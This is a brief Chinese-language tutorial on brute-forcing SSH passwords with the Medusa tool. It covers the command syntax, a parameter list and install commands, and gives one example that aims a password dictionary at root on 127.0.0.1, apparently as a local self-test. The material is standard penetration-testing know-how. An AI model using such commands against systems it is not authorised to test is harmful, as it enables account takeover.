使用美杜莎(medusa)暴力破解SSH密码
语法以及参数说明:
语法:
Medusa [-h host |-h file] [-u用户名| -u文件][-p密码|-p文件] [C文件] -M模块[OPT]
参数 说明
-h[TEXT] 目标主机名或IP地址-H[FILE] 包含目标主机名或IP地址的文件-u[TEXT] 要测试的用户名-U[FILE] 包含要测试的用户名的文件-p[TEXT] 测试密码-P[FILE] 包含要测试的密码的文件-C[FILE] 包含组合项的文件。有关更多信息,请参阅自述文件。-O[FILE] 要附加日志信息的文件-e[n/s/ns] 附加密码检查([n]无密码,[s]密码=用户名)-M[TEXT] 要执行的模块的名称(不带.mod扩展名)-m[TEXT] 要传递给模块的参数。可以使用每次不同的参数,它们都将被发送到模块(即。-m参数1-m参数2等-d 显示所有已安装的模块-n[NUM] 用于非默认TCP端口号-s 启用SSL-g[NUM] 尝试连接NUM秒后放弃(默认值3)-r[NUM] 重试尝试之间的睡眠NUM秒数(默认值为3)-R[NUM] 在放弃之前尝试NUM重试。总尝试次数将为NUM+1。-c[NUM] 等待usec验证套接字可用的时间(默认为500 usec)。-t[NUM] 同时测试的登录总数-T[NUM] 同时测试的主机总数-L 每个线程使用一个用户名并行登录。默认为处理继续之前输入整个用户名。-f 找到第一个有效用户名/密码后,停止扫描主机。-F 在任何主机上找到第一个有效的用户名/密码后,停止审计。-b 禁止启动横幅-q 显示模块的使用信息-v[NUM] 详细级别[0-6(更多)]-w[NUM] 错误调试级别[0-10(更多)]-V 显示版本-Z[TEXT] 根据上次扫描的地图恢复扫描
第一步:安装美杜莎(medusa)
apt -y install medusa (debian 系列)
yum -y install medusa (redhat 系列)
第二步:检测目标主机22号端口是否开启
第三步:使用密码字典库进行暴 LP 解
#设置随机密码
#创建一个包含该密码的字典库
#示例
medusa -h 127.0.0.1 -u root -P password.txt -M ssh -n 22 -t 10 -O result.txt
# -h指定目标主机
# -u指定目标用户名
# -P指定密码字典库
# -M指定模块
# -n指定 SSH 端口号,默认是22
# -t指定线程数
# -O指定执行结果输出的文件
执行完成后查看result.txt 文件
#使用该密码进行登录